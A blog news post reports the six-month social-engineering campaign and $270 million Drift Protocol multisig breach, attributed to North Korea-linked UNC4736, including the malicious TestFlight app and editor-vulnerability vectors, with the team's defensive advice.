Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label North Korean hackers crypto. Show all posts
UNC4736 AppleJeus
Cyber Security DeFi security breach Drift Protocol Hack multisig attack crypto North Korean hackers crypto UNC4736 AppleJeus

North Korean Group Allegedly Orchestrates $270M Drift Protocol Hack After Months-Long Infiltration

 

A sophisticated intelligence campaign spanning six months reportedly led to the $270 million breach of Drift Protocol, with investigators linking the operation to a North Korean state-backed threat group. The details were revealed in an incident update shared by the protocol’s team on Sunday.

According to the report, the attackers initiated contact in fall 2025 during a prominent cryptocurrency conference. They posed as representatives of a quantitative trading firm interested in integrating with Drift. The group demonstrated strong technical expertise, credible professional histories, and a deep understanding of the platform’s functionality. Communication soon moved to a Telegram group, where discussions over trading strategies and vault integrations continued for months—mirroring typical onboarding processes for DeFi trading firms.

Between December 2025 and January 2026, the group successfully onboarded an Ecosystem Vault, participated in multiple collaborative sessions, invested more than $1 million of their own funds, and established a seemingly legitimate operational role within the ecosystem.

Drift contributors also met members of the group in person at several major global industry events through February and March. By the time the exploit occurred on April 1, the relationship had developed over nearly half a year.

Investigators believe the breach stemmed from two primary attack vectors.

One of these involved a malicious TestFlight application—Apple’s platform for distributing pre-release apps outside the App Store’s standard review process—which the attackers presented as their wallet solution.

The second vector exploited a known vulnerability in widely used development tools VSCode and Cursor. Security researchers had flagged this issue since late 2025, noting that simply opening a file or folder could trigger silent execution of malicious code without any warning.

After gaining access to contributor devices, the attackers were able to secure the required approvals for a multisig transaction. These pre-authorized transactions remained inactive for over a week before being executed on April 1, allowing the attackers to siphon $270 million from Drift’s vaults in less than a minute.

The attack has been attributed to UNC4736, a group associated with North Korea and also known as AppleJeus or Citrine Sleet. This conclusion is based on blockchain transaction trails linked to previous Radiant Capital attacks, as well as similarities in operational tactics tied to known DPRK-linked actors.

Interestingly, individuals who attended conferences and interacted in person were not North Korean nationals. Experts note that such groups often deploy intermediaries with carefully crafted identities, complete with credible employment records and professional networks designed to pass scrutiny.

In response, Drift has advised other DeFi protocols to reassess their security frameworks, particularly access controls. The team emphasized that any device involved in multisig governance should be treated as a potential point of compromise.

The incident raises broader concerns for the industry. Multisig systems are widely relied upon as a core security mechanism, but this case highlights their limitations. If attackers are prepared to invest months, significant capital, and real-world interactions to build trust within a platform, it challenges the effectiveness of existing security models in detecting such deeply embedded threats.
Read more »
Subscribe to: Comments (Atom)